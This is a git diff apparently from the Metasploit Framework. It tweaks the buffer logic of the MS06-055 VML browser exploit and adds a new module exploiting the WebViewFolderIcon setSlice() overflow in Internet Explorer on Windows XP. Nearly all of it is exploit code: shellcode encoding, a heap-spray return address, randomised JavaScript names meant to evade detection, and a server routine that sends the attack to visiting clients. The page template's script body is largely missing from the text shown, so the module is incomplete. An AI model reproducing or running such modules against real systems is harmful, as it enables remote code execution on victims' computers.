diff --git a/modules/exploits/windows/browser/ms06_055_vml_method.rb b/modules/exploits/windows/browser/ms06_055_vml_method.rb index 8c4c2319ff..50e7507464 100644 --- a/modules/exploits/windows/browser/ms06_055_vml_method.rb +++ b/modules/exploits/windows/browser/ms06_055_vml_method.rb @@ -55,10 +55,9 @@ class Exploits::Windows::Browser::MS06_055_VML_Overflow < Msf::Exploit::Remote # Determine the buffer length to use buflen = 1024 - # if () - # buflen = 65535 - # end - buflen = 65535 + if (request.headers['User-Agent'] =~ /Windows 5\.[123]/) + buflen = 65535 + end # Encode the shellcode shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) diff --git a/modules/exploits/windows/browser/webview_setslice.rb b/modules/exploits/windows/browser/webview_setslice.rb new file mode 100644 index 0000000000..38045df66f --- /dev/null +++ b/modules/exploits/windows/browser/webview_setslice.rb @@ -0,0 +1,116 @@ +require 'msf/core' + +module Msf + +class Exploits::Windows::Browser::WebView_SetSlice < Msf::Exploit::Remote + + include Exploit::Remote::HttpServer::Html + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Internet Explorer WebViewFolderIcon setSlice() Overflow', + 'Description' => %q{ + This module exploits a flaw in the WebViewFolderIcon ActiveX control + included with Windows 2000, Windows XP, and Windows 2003. This flaw was published + during the Month of Browser Bugs project (MoBB #18). + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'hdm', + ], + 'Version' => '$Revision: 3783 $', + 'References' => + [ + [ 'OSVDB', '27110' ], + [ 'BID', '19030' ], + [ 'URL', 'http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html' ] + ], + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "\x00", + + }, + 'Platform' => 'win', + 'Targets' => + [ + ['Windows XP SP0-SP2 / IE 6.0SP1 English', {'Ret' => 0x0c0c0c0c} ] + ], + 'DefaultTarget' => 0)) + end + + def autofilter + false + end + + def on_request_uri(cli, request) + + # Re-generate the payload + return if ((p = regenerate_payload(cli)) == nil) + + # Encode the shellcode + shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) + + # Get a unicode friendly version of the return address + ret_addr = [target.ret].pack('H*')[0,4] + + # Randomize the javascript variable names + var_shellcode = Rex::Text.rand_text_alpha(rand(30)+2) + var_unescape = Rex::Text.rand_text_alpha(rand(30)+2) + var_x = Rex::Text.rand_text_alpha(rand(30)+2) + var_i = Rex::Text.rand_text_alpha(rand(30)+2) + var_tic = Rex::Text.rand_text_alpha(rand(30)+2) + var_toc = Rex::Text.rand_text_alpha(rand(30)+2) + + # Randomize HTML data + html = Rex::Text.rand_text_alpha(rand(30)+2) + + # Build out the message + content = %Q| + +
+ + + +#{html} + + + | + + print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") + + # Transmit the response to the client + send_response(cli, content) + end + +end + +end